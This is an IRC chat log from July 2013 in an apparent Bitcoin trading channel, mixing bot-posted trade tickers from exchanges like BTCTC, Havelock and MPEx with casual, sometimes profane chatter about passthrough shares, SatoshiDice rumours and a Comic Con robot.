http://www.youtube.com/watch?v=cFwEiG4I-Wg&feature=share Jul 19 01:27:41 Giant Robot Storms San Diego Comic Con 2013 - Wired App Wired - YouTube Jul 19 01:27:47 I may need to buy one of these Jul 19 01:29:00 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 01:29:08 So that's what Adam Savage went as Jul 19 01:29:35 lol great Jul 19 01:29:47 I had the news in my feed on Facebook asking fans of Mythbusters to take guesses. Jul 19 01:31:13 [BTCTC] [S.DICE-PT] 1 @ 0.031 BTC [+] Jul 19 01:31:34 Oh, it's not a disguise... Jul 19 01:31:37 Fuck Jul 19 01:31:48 [BTCTC] [AMC-PT] 1337 @ 0.0025 = 3.3425 BTC [+] Jul 19 01:31:57 Lame Jul 19 01:32:02 [HAVELOCK] [AM1] 1 @ 4.849 BTC [-] Jul 19 01:32:20 Lacks space inside for a pilot. Jul 19 01:32:26 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 19 01:32:32 yeah, its just a real robot, lame Jul 19 01:32:50 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 19 01:32:59 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [+] Jul 19 01:33:01 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jul 19 01:33:03 [BTCTC] [BASIC-MINING] 9 @ 0.687 = 6.183 BTC [-] Jul 19 01:33:04 [BTCTC] [ASICMINER-PT] 1 @ 4.61111 BTC [-] Jul 19 01:33:11 [BTCTC] [BASIC-MINING] 1 @ 0.68696 BTC [-] Jul 19 01:33:13 [BTCTC] [ASICMINER-PT] 3 @ 4.6111 = 13.8333 BTC [-] Jul 19 01:33:22 [BTCTC] [BASIC-MINING] 1 @ 0.6701 BTC [-] Jul 19 01:33:28 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [-] Jul 19 01:34:20 [BTCTC] [AMC-PT] 11800 @ 0.0025 = 29.5 BTC [+] Jul 19 01:34:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 19 01:34:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 19 01:35:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0464 BTC [+] Jul 19 01:35:34 Yeah, I know it's awesome. Jul 19 01:35:53 Still, when can I have an armored exoskeleton? Jul 19 01:35:56 [BTCTC] [AMC-PT] 2182 @ 0.0025 = 5.455 BTC [+] Jul 19 01:35:59 [BTCTC] [AMC-PT] 37 @ 0.0025 = 0.0925 BTC [+] Jul 19 01:36:36 [HAVELOCK] [AM1] 1 @ 4.7 BTC [-] Jul 19 01:36:39 [HAVELOCK] [AM1] 1 @ 4.6 BTC [-] Jul 19 01:37:21 When you get the money Jul 19 01:37:50 http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/#c1126 Jul 19 01:37:57 i wonder how long before bitbet trolling hits its prime Jul 19 01:38:00 BitBet - BitBet will we worth more than Satoshi Dice Jul 19 01:38:07 This would almost do as an early prototype... just need to be a bit bigger so there can be empty space in the middle. Jul 19 01:39:27 i prefer remotely controlled drones Jul 19 01:39:50 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 01:39:52 ANNOUNCEMENT - S.MG shares are now available via passthrough at Havelock Investments: https://www.havelockinvestments.com/fund.php?symbol=SMG Jul 19 01:40:01 o hey. Jul 19 01:40:03 BitFunder PT also imminent Jul 19 01:40:36 forum thread here: https://bitcointalk.org/index.php?topic=258788.0 Jul 19 01:40:48 lol ThickAsThieves how many third parties are there? Jul 19 01:41:04 jurov, of course you use drones. You still need protection, even if you're not out there. Jul 19 01:41:10 topace, you, me, mircea Jul 19 01:41:31 [BTCTC] [AMC-PT] 316 @ 0.0025 = 0.79 BTC [+] Jul 19 01:41:31 how am i a third party. Jul 19 01:41:42 im the first motherfuckin party. teh original party! Jul 19 01:41:43 if volume justifies, I may get a real MPEx account Jul 19 01:41:55 ThickAsThieves accept no substitutes! Jul 19 01:42:17 good thing I didn't so my MPEX4 PT idea Jul 19 01:42:20 do* Jul 19 01:42:30 whassat ? Jul 19 01:43:27 1 of each mpex share wrapped into 1 Jul 19 01:43:45 SDICE, BBET, MG, MPOE Jul 19 01:43:58 No more SDICE Jul 19 01:43:58 aint no party like a mpex party Jul 19 01:44:04 RIP DICE Jul 19 01:44:06 a a Jul 19 01:44:12 now it's just MPEX3 tho Jul 19 01:44:14 :( Jul 19 01:44:22 well youy'd have had a cash distribution Jul 19 01:44:24 not the worst fate Jul 19 01:44:46 Indeed Jul 19 01:44:53 true, i'm making time to read up on how such assets handle added assets Jul 19 01:45:21 i have Russell bookmarks to start Jul 19 01:45:39 index methodology Jul 19 01:45:39 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 01:45:58 ideally some people actualyl make some btc businesses Jul 19 01:46:03 lol my bad. ofc mircea is 1st party, maybe even 0th party Jul 19 01:46:04 rather than rehash endlessly the same tired scams Jul 19 01:46:12 indeed Jul 19 01:46:12 but to quote some discussion in eve, Jul 19 01:46:26 [BTCTC] [ASICMINER-PT] 1 @ 4.611101 BTC [+] Jul 19 01:46:30 i'll just fund out my portfolio eventually Jul 19 01:46:40 or not Jul 19 01:46:45 "aren't people bored of the same old scams ? " "well, they still work" Jul 19 01:47:14 [BTCTC] [ASICMINER-PT] 12 @ 4.6111 = 55.3332 BTC [-] Jul 19 01:47:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0464 = 0.0928 BTC [+] Jul 19 01:48:05 [MPEX] [S.MPOE] 7700 @ 0.00088875 = 6.8434 BTC [-] Jul 19 01:49:45 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 01:49:58 [BTCTC] [GSDPT] 13 @ 0.003419 = 0.0444 BTC [-] Jul 19 01:50:16 if some noob shows up on webirc wanting to interview me someone please do a highlight ty. Jul 19 01:50:51 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jul 19 01:51:21 np, i Jul 19 01:51:29 will just do something like Jul 19 01:51:43 yes? Jul 19 01:52:18 I know everything! Jul 19 01:52:22 omfg buncha trolls Jul 19 01:52:40 im trying to play eve over here Jul 19 01:53:10 [MPEX] [S.MPOE] 1350 @ 0.00088875 = 1.1998 BTC [-] Jul 19 01:53:11 [MPEX] [S.MPOE] 7063 @ 0.00088897 = 6.2788 BTC [+] Jul 19 01:53:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.0464 = 0.1856 BTC [+] Jul 19 01:53:44 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 01:54:11 lol Jul 19 01:54:36 Lol Jul 19 01:55:27 lol Jul 19 01:55:29 silly mirceas, there's a whole bunch of them now Jul 19 01:55:36 [MPEX] [S.MG] 1000 @ 0.00018101 = 0.181 BTC [-] Jul 19 01:56:32 my producer thought the angry eskimo would get more ratings, but we're going with the gypsy Jul 19 01:57:00 good call Jul 19 01:57:13 da fuck. barbara walters IS a producer Jul 19 01:57:29 but who produces the producers? Jul 19 01:57:32 does you're barber cut his own hair? Jul 19 01:57:45 does your english teacher cut himself? Jul 19 01:58:20 lol Jul 19 01:58:20 ever notice dice games? Jul 19 01:58:24 this is actually going pretty good Jul 19 01:58:39 [HAVELOCK] [SMG] 870 @ 0.00027 = 0.2349 BTC Jul 19 01:59:02 yay! Jul 19 01:59:12 I'm rich! Jul 19 01:59:29 [HAVELOCK] [SMG] 4130 @ 0.00027 = 1.1151 BTC Jul 19 02:00:07 [HAVELOCK] [SMG] 5000 @ 0.00033 = 1.65 BTC [+] Jul 19 02:00:18 eat my dust mpex Jul 19 02:00:40 [HAVELOCK] [SMG] 2550 @ 0.0004 = 1.02 BTC [+] Jul 19 02:00:53 fuck. why do I use armory. Jul 19 02:01:05 cuz you are bleeding edge Jul 19 02:01:17 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 19 02:01:17 Because armory is nice for offline wallets Jul 19 02:01:31 I wanted those 0.00027 Jul 19 02:01:36 andy_rooney, what do you mean? Jul 19 02:01:37 but it takes so long to load Jul 19 02:01:56 [HAVELOCK] [SMG] 31 @ 0.0004 = 0.0124 BTC [+] Jul 19 02:02:02 [HAVELOCK] [SMG] 2419 @ 0.0004 = 0.9676 BTC [+] Jul 19 02:02:10 [23:01:48] BASIC-MINING Add Ask 381 @ 0.779990 Jul 19 02:02:19 pew.. Jul 19 02:02:24 that suxx lol Jul 19 02:02:38 [HAVELOCK] [SMG] 1000 @ 0.0005 = 0.5 BTC [+] Jul 19 02:02:43 gogogo Jul 19 02:02:46 The ask price on MPEx is 0.0002475 Jul 19 02:02:57 Why would people buy at 0.0005? Jul 19 02:03:04 because they're retarded Jul 19 02:03:10 or 0.00027 for that matter Jul 19 02:03:18 my evil plan was to buy-and-sell in a few minutes Jul 19 02:03:26 but it was foiled by a slow computer Jul 19 02:03:53 I'll make a S.MG-PT on Havelock Jul 19 02:03:57 Namworld: I mean why not just click "withdraw to bank account" on gox if you want a gamble Jul 19 02:03:58 Sell for 0.00025 Jul 19 02:04:05 aw crap wrong window! Jul 19 02:04:14 darn! Jul 19 02:04:25 [HAVELOCK] [SMG] 1500 @ 0.0005 = 0.75 BTC [+] Jul 19 02:04:41 andy, whatcha talking about to yourself like that? Jul 19 02:05:22 hey Jul 19 02:05:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003938 = 0.0394 BTC [-] Jul 19 02:05:30 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003939 = 0.3939 BTC [+] Jul 19 02:05:47 [HAVELOCK] [SMG] 350 @ 0.0005 = 0.175 BTC [+] Jul 19 02:06:02 http://www.youtube.com/watch?v=-bzWSJG93P8 Jul 19 02:06:03 Star Wars- The Imperial March (Darth Vader's Theme) - YouTube Jul 19 02:06:05 wait wut Jul 19 02:06:19 Darth Voorhees! Jul 19 02:06:44 Namworld: I mean why not just click "withdraw to bank account" on gox if you want a gamble <<< bwahahaha Jul 19 02:06:51 [HAVELOCK] [AM100] 1 @ 0.0459 BTC [+] Jul 19 02:06:53 damn short nicks Jul 19 02:07:28 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC [-] Jul 19 02:08:03 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 02:08:32 [BTCTC] [ASICMINER-PT] 3 @ 4.6111 = 13.8333 BTC [-] Jul 19 02:08:34 [BTCTC] [ASICMINER-PT] 1 @ 4.6111 BTC [-] Jul 19 02:08:36 [BTCTC] [ASICMINER-PT] 7 @ 4.611 = 32.277 BTC [-] Jul 19 02:09:13 [HAVELOCK] [SMG] 2150 @ 0.0005 = 1.075 BTC [+] Jul 19 02:09:32 [MPEX] [S.MG] 5282 @ 0.0002475 = 1.3073 BTC [+] Jul 19 02:09:34 [MPEX] [S.MG] 12568 @ 0.00025 = 3.142 BTC [+] Jul 19 02:10:18 [MPEX] [S.MG] 2150 @ 0.00025 = 0.5375 BTC [+] Jul 19 02:10:43 [BTCTC] [TAT.ASICMINER] 32 @ 0.0458 = 1.4656 BTC [-] Jul 19 02:11:19 [BTCTC] [TAT.ASICMINER] 21 @ 0.0464 = 0.9744 BTC [+] Jul 19 02:11:27 [MPEX] [S.MG] 5282 @ 0.00025 = 1.3205 BTC [+] Jul 19 02:11:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.0453 = 0.3171 BTC [-] Jul 19 02:11:51 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 19 02:11:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [-] Jul 19 02:12:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.044 = 0.132 BTC [-] Jul 19 02:12:52 [BTCTC] [AMC-PT] 850 @ 0.0025 = 2.125 BTC [+] Jul 19 02:13:20 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 02:13:22 [BTCTC] [ASICMINER-PT] 11 @ 4.611 = 50.721 BTC [-] Jul 19 02:14:06 [BTCTC] [TAT.ASICMINER] 14 @ 0.044 = 0.616 BTC [-] Jul 19 02:14:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.044 = 0.088 BTC [-] Jul 19 02:14:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.044 = 0.22 BTC [-] Jul 19 02:14:19 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 02:14:22 [MPEX] [S.MG] 5000 @ 0.00027 = 1.35 BTC [+] Jul 19 02:14:48 [BTCTC] [S.DICE-PT] 20 @ 0.003489 = 0.0698 BTC [-] Jul 19 02:14:50 [BTCTC] [S.DICE-PT] 20 @ 0.00349 = 0.0698 BTC [+] Jul 19 02:14:51 [BTCTC] [S.DICE-PT] 60 @ 0.0035 = 0.21 BTC [+] Jul 19 02:15:02 [BTCTC] [AMC-PT] 267 @ 0.0025 = 0.6675 BTC [+] Jul 19 02:15:50 [BTCTC] [AMC-PT] 1900 @ 0.0025 = 4.75 BTC [+] Jul 19 02:16:02 [HAVELOCK] [SMG] 5000 @ 0.0006 = 3 BTC [+] Jul 19 02:17:13 [BTCTC] [BASIC-MINING] 3 @ 0.714799 = 2.1444 BTC [+] Jul 19 02:17:26 [MPEX] [S.MG] 25000 @ 0.00027 = 6.75 BTC [+] Jul 19 02:17:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003956 = 0.0396 BTC [+] Jul 19 02:17:58 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.003957 = 0.3561 BTC [+] Jul 19 02:18:38 [BTCTC] [AMC-PT] 18153 @ 0.0025 = 45.3825 BTC [+] Jul 19 02:18:39 [BTCTC] [ASICMINER-PT] 2 @ 4.611 = 9.222 BTC [-] Jul 19 02:18:42 [HAVELOCK] [SMG] 16 @ 0.00077 = 0.0123 BTC [+] Jul 19 02:18:45 [BTCTC] [AMC-PT] 24 @ 0.0025 = 0.06 BTC [+] Jul 19 02:20:22 [HAVELOCK] [SMG] 4984 @ 0.00077 = 3.8377 BTC [+] Jul 19 02:20:59 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 19 02:21:27 [BTCTC] [BASIC-MINING] 2 @ 0.7148 = 1.4296 BTC [+] Jul 19 02:21:32 [HAVELOCK] [SMG] 5000 @ 0.00088 = 4.4 BTC [+] Jul 19 02:21:57 [MPEX] [S.MG] 4950 @ 0.0004 = 1.98 BTC [+] Jul 19 02:22:09 [HAVELOCK] [SMG] 1900 @ 0.00095 = 1.805 BTC [+] Jul 19 02:22:18 jesus Jul 19 02:23:15 yes? Jul 19 02:23:22 [BTCTC] [AMC-PT] 3670 @ 0.0025 = 9.175 BTC [+] Jul 19 02:23:29 [HAVELOCK] [SMG] 15 @ 0.00095 = 0.0143 BTC [+] Jul 19 02:24:27 [HAVELOCK] [AM100] 5 @ 0.04500011 = 0.225 BTC [-] Jul 19 02:24:40 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 02:24:51 [MPEX] [S.MPOE] 9971 @ 0.00089291 = 8.9032 BTC [+] Jul 19 02:24:53 [MPEX] [S.MPOE] 7568 @ 0.00089362 = 6.7629 BTC [+] Jul 19 02:24:56 [HAVELOCK] [SMG] 3085 @ 0.00095 = 2.9308 BTC [+] Jul 19 02:25:03 [MPEX] [S.MPOE] 4661 @ 0.00089397 = 4.1668 BTC [+] Jul 19 02:25:40 [HAVELOCK] [SMG] 16 @ 0.00077 = 0.0123 BTC [+] Jul 19 02:25:41 0.o Jul 19 02:25:49 [19:25] <@assbot> [HAVELOCK] [SMG] 3085 @ 0.00095 = 2.9308 BTC [+] Jul 19 02:26:00 well i guess there's profit in pts. Jul 19 02:26:37 for the op, yes Jul 19 02:26:40 man, there's a massive market out there that can't figure out how to pgp their mpex Jul 19 02:27:01 not that this should surprise anyone Jul 19 02:27:34 benkay well... massive. 2btc. Jul 19 02:27:40 but surely lots of ppl. Jul 19 02:27:52 mp can you facilitate by helping jurov with deposits? Jul 19 02:28:00 surely. Jul 19 02:28:03 thx Jul 19 02:28:32 all deposits are flushed atm Jul 19 02:29:36 [HAVELOCK] [AM100] 1 @ 0.04500011 BTC [-] Jul 19 02:29:37 well, i had still cached them outside mpex in expectation of post-s.dice withdrawals Jul 19 02:29:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.043201 BTC [-] Jul 19 02:29:59 2btc is total moved through pts? Jul 19 02:29:59 [BTCTC] [DMS.SELLING] 40 @ 0.02221 = 0.8884 BTC [-] Jul 19 02:30:01 [BTCTC] [DMS.SELLING] 41 @ 0.0222 = 0.9102 BTC [-] Jul 19 02:30:05 now TAT came and threw a wrench there :D Jul 19 02:30:28 [BTCTC] [TAT.ASICMINER] 46 @ 0.044 = 2.024 BTC [+] Jul 19 02:30:54 [BTCTC] [ASICMINER-PT] 1 @ 4.612 BTC [+] Jul 19 02:31:50 [BTCTC] [ASICMINER-PT] 3 @ 4.611 = 13.833 BTC [-] Jul 19 02:32:20 kik Jul 19 02:32:32 !t h smg Jul 19 02:32:33 [HAVELOCK:SMG] 1D: 0.00027000 / 0.0005875 / 0.00095000 (40000 shares, 23.50000000 BTC), 7D: 0.00027000 / 0.0005875 / 0.00095000 (40000 shares, 23.50000000 BTC), 30D: 0.00027000 / 0.0005875 / 0.00095000 (40000 shares, 23.50000000 BTC) Jul 19 02:32:45 benkay i guess 20 Jul 19 02:33:05 am i misreading this or is it 2x mpex min 5x mpex max ? Jul 19 02:33:25 sounds about right Jul 19 02:34:09 should have ipo'ed in on havelock Jul 19 02:35:58 [BTCTC] [AMC-PT] 7390 @ 0.0025 = 18.475 BTC [+] Jul 19 02:37:21 will keep in mind fior next tiem Jul 19 02:38:22 :) Jul 19 02:42:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.043202 BTC [-] Jul 19 02:42:26 [BTCTC] [TAT.ASICMINER] 25 @ 0.044 = 1.1 BTC [+] Jul 19 02:42:54 [BTCTC] [B.YABMC] 8 @ 0.00298 = 0.0238 BTC [+] Jul 19 02:43:24 [MPEX] [S.MG] 100000 @ 0.0002 = 20 BTC [-] Jul 19 02:43:52 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 02:45:17 [BTCTC] [S.BBET-PT] 1 @ 0.002019 BTC [+] Jul 19 02:46:53 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 02:47:44 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 02:48:12 [HAVELOCK] [AM100] 1 @ 0.0445 BTC [-] Jul 19 02:48:14 [HAVELOCK] [AM100] 99 @ 0.044402 = 4.3958 BTC [-] Jul 19 02:48:24 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 02:48:55 [HAVELOCK] [SMG] 210 @ 0.00095 = 0.1995 BTC [+] Jul 19 02:49:28 kinda funny read https://bitcointalk.org/index.php?topic=258662.0 Jul 19 02:49:34 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 02:49:37 [HAVELOCK] [AM100] 98 @ 0.044402 = 4.3514 BTC [-] Jul 19 02:53:38 [HAVELOCK] [SMG] 40 @ 0.0001 = 0.004 BTC [-] Jul 19 02:53:40 [HAVELOCK] [SMG] 1263 @ 0.000095 = 0.12 BTC [-] Jul 19 02:53:58 "Designing we are Bootstraping the website....." Jul 19 02:54:00 seems legit. Jul 19 02:55:25 [HAVELOCK] [SMG] 200 @ 0.0007 = 0.14 BTC [+] Jul 19 02:55:33 [MPEX] [S.MPOE] 8288 @ 0.00089231 = 7.3955 BTC [-] Jul 19 02:56:24 [HAVELOCK] [SMG] 35 @ 0.0007 = 0.0245 BTC [+] Jul 19 02:56:39 [HAVELOCK] [SMG] 800 @ 0.0007 = 0.56 BTC [+] Jul 19 02:57:39 [BTCTC] [AMC-PT] 655 @ 0.0025 = 1.6375 BTC [+] Jul 19 02:58:47 [BTCTC] [DMS.SELLING] 5 @ 0.023 = 0.115 BTC [+] Jul 19 02:59:34 [BTCTC] [AMC-PT] 5600 @ 0.0025 = 14 BTC [+] Jul 19 02:59:38 [BTCTC] [AMC-PT] 3000 @ 0.0025 = 7.5 BTC [+] Jul 19 03:01:01 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [+] Jul 19 03:01:04 [HAVELOCK] [SMG] 1 @ 0.0007 BTC [+] Jul 19 03:01:23 [BTCTC] [BFMINES] 4 @ 0.003999 = 0.016 BTC [+] Jul 19 03:01:53 [BTCTC] [TAT.ASICMINER] 43 @ 0.044 = 1.892 BTC [+] Jul 19 03:02:19 [BTCTC] [COGNITIVE] 2 @ 0.690036 = 1.3801 BTC [+] Jul 19 03:02:21 [BTCTC] [COGNITIVE] 32 @ 0.690035 = 22.0811 BTC [-] Jul 19 03:02:31 [MPEX] [S.MG] 13500 @ 0.000225 = 3.0375 BTC [+] Jul 19 03:02:55 [BTCTC] [AMC-PT] 718 @ 0.0025 = 1.795 BTC [+] Jul 19 03:02:58 [BTCTC] [AMC-PT] 1196 @ 0.0025 = 2.99 BTC [+] Jul 19 03:07:05 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jul 19 03:08:05 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 03:08:16 [BTCTC] [BITVPS] 1 @ 0.00182 BTC [+] Jul 19 03:08:34 mircea_popescu: deposits please Jul 19 03:09:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [+] Jul 19 03:10:12 omg stuff's not even confirmed Jul 19 03:10:16 what;s the fire! Jul 19 03:10:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.044 = 2.2 BTC [+] Jul 19 03:10:35 certain people are front running each other Jul 19 03:10:40 lol Jul 19 03:11:37 [BTCTC] [AMC-PT] 16 @ 0.0025 = 0.04 BTC [+] Jul 19 03:12:43 [BTCTC] [AMC-PT] 560 @ 0.0025 = 1.4 BTC [+] Jul 19 03:15:22 and i want to go to bed, my head hurts Jul 19 03:16:56 [BTCTC] [ASICMINER-PT] 1 @ 4.610002 BTC [-] Jul 19 03:17:58 [HAVELOCK] [AM100] 44 @ 0.04500011 = 1.98 BTC [+] Jul 19 03:18:29 [HAVELOCK] [SMG] 2 @ 0.00045 = 0.0009 BTC [-] Jul 19 03:18:46 [BTCTC] [AMC-PT] 1940 @ 0.0025 = 4.85 BTC [+] Jul 19 03:19:05 http://www.reddit.com/r/Bitcoin/comments/1ilitv/im_999_sure_i_know_who_bought_satoshidicecom_and/ Jul 19 03:19:07 I'm 99.9% sure I know who bought SatoshiDice.com and I'm willing to 'bet' on it! : Bitcoin Jul 19 03:19:15 [MPEX] [S.MG] 50000 @ 0.000225 = 11.25 BTC [+] Jul 19 03:21:56 omg they really attended the same conference! Jul 19 03:22:10 lol@ reddity Jul 19 03:22:20 by the same measure erik was at secret timisoara conference Jul 19 03:22:29 wences casares was there, whatever millions, whatever risk taker Jul 19 03:23:26 I have already tabled the mp bought sd conspiracy Jul 19 03:24:05 before anyone tries to take the wind out of my tinfoil sail Jul 19 03:24:20 dub you're like the 5th Jul 19 03:24:29 no u Jul 19 03:25:57 maybe pirate bought it Jul 19 03:27:12 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 19 03:27:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.043989 BTC [-] Jul 19 03:28:48 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [+] Jul 19 03:28:58 [BTCTC] [AMC-PT] 1920 @ 0.0025 = 4.8 BTC [+] Jul 19 03:29:54 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 03:29:57 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 03:31:31 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 19 03:34:15 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [+] Jul 19 03:34:58 jurov Jul 19 03:35:29 [HAVELOCK] [SMG] 100 @ 0.00059 = 0.059 BTC [+] Jul 19 03:36:14 yes? got it, thanks! Jul 19 03:36:15 HAH namworld I didnt know that was your alarm. It sucks because it woke me the fuck up in the middle of the night with a false alarm. Jul 19 03:36:24 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 19 03:36:26 But thanks for trying anyway. Jul 19 03:36:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04399 BTC [+] Jul 19 03:39:35 see you, will check back in few hours Jul 19 03:43:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003849 = 0.0077 BTC [-] Jul 19 03:44:16 [MPEX] [S.MG] 46000 @ 0.000225 = 10.35 BTC [+] Jul 19 03:44:29 [HAVELOCK] [SMG] 1 @ 0.00058 BTC [-] Jul 19 03:44:51 [HAVELOCK] [SMG] 1000 @ 0.0003 = 0.3 BTC [-] Jul 19 03:45:00 [BTCTC] [AMC-PT] 60000 @ 0.0025 = 150 BTC [+] Jul 19 03:45:09 [HAVELOCK] [SMG] 1 @ 0.00058 BTC [+] Jul 19 03:45:53 [HAVELOCK] [SMG] 2000 @ 0.00045 = 0.9 BTC [-] Jul 19 03:46:17 [HAVELOCK] [SMG] 1 @ 0.00058 BTC [+] Jul 19 03:47:02 [HAVELOCK] [HIM] 10 @ 0.267 = 2.67 BTC [+] Jul 19 03:47:15 [HAVELOCK] [SMG] 4000 @ 0.00025 = 1 BTC [-] Jul 19 03:47:20 [HAVELOCK] [AM100] 5 @ 0.0455 = 0.2275 BTC [+] Jul 19 03:47:51 https://bitcointalk.org/index.php?topic=258281.msg2758764#msg2758764 Jul 19 03:47:52 lmao Jul 19 03:47:57 the forum can not find the bottom Jul 19 03:47:58 [BTC-TC] [BitFunder] [Havelock] BITBOND - 0.06% DAILY Jul 19 03:48:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.04399 = 0.088 BTC [+] Jul 19 03:48:35 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 19 03:49:56 [BTCTC] [CRYPTO-TRADE] 50 @ 0.199999 = 10 BTC [+] Jul 19 03:50:00 [BTCTC] [ASICMINER-PT] 1 @ 4.581001 BTC [-] Jul 19 03:50:03 [BTCTC] [ASICMINER-PT] 1 @ 4.569002 BTC [-] Jul 19 03:50:05 [BTCTC] [ASICMINER-PT] 1 @ 4.54 BTC [-] Jul 19 03:50:21 [BTCTC] [ASICMINER-PT] 10 @ 4.53 = 45.3 BTC [-] Jul 19 03:50:36 same user "asicminer doesnt have a future eventualy the block reward will half and so will dividends" Jul 19 03:50:42 [HAVELOCK] [AM100] 3 @ 0.046 = 0.138 BTC [+] Jul 19 03:50:53 [BTCTC] [AMC-PT] 50 @ 0.002495 = 0.1248 BTC [-] Jul 19 03:52:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003716 = 0.0372 BTC [-] Jul 19 03:52:48 [MPEX] [S.MPOE] 9937 @ 0.00088631 = 8.8073 BTC [-] Jul 19 03:52:50 [MPEX] [S.MPOE] 4049 @ 0.00088552 = 3.5855 BTC [-] Jul 19 03:53:43 [BTCTC] [AMC-PT] 31 @ 0.002495 = 0.0773 BTC [-] Jul 19 03:53:58 [BTCTC] [AMC-PT] 35 @ 0.002495 = 0.0873 BTC [-] Jul 19 03:54:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003717 BTC [+] Jul 19 03:55:05 [HAVELOCK] [AM100] 12 @ 0.0455 = 0.546 BTC [-] Jul 19 03:55:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.043276 = 2.1638 BTC [-] Jul 19 03:55:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.043275 = 2.1638 BTC [-] Jul 19 03:55:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.04327 = 0.0865 BTC [-] Jul 19 03:55:43 enclosurefrednom: lol Jul 19 03:56:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003718 BTC [+] Jul 19 03:56:50 [BTCTC] [AMC-PT] 4845 @ 0.0025 = 12.1125 BTC [+] Jul 19 03:57:33 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 03:57:35 [BTCTC] [COGNITIVE] 1 @ 0.805 BTC [+] Jul 19 03:57:39 [BTCTC] [COGNITIVE] 1 @ 0.805 BTC [+] Jul 19 03:57:46 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 03:58:03 ;;ticker Jul 19 03:58:04 MtGox BTCUSD ticker | Best bid: 91.09400, Best ask: 91.09976, Bid-ask spread: 0.00576, Last trade: 91.10000, 24 hour volume: 58837.00252483, 24 hour low: 86.20000, 24 hour high: 98.42843, 24 hour vwap: 90.90018 Jul 19 03:59:27 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 19 04:00:17 ;;baratio Jul 19 04:00:18 [BTCTC] [COGNITIVE] 3 @ 0.804999 = 2.415 BTC [-] Jul 19 04:00:20 Total bids: 11976556 USD. Total asks: 120911 BTC. Ratio: 99.05248 USD/BTC. | Data vintage: 0.0065 seconds Jul 19 04:00:30 [BTCTC] [LTC-ATF.B2] 4 @ 0.0103 = 0.0412 BTC [-] Jul 19 04:01:10 [HAVELOCK] [SMG] 2 @ 0.00057998 = 0.0012 BTC [+] Jul 19 04:01:27 [BTCTC] [AMC-PT] 842 @ 0.0025 = 2.105 BTC [+] Jul 19 04:02:19 [HAVELOCK] [VTX] 1 @ 0.633 BTC [+] Jul 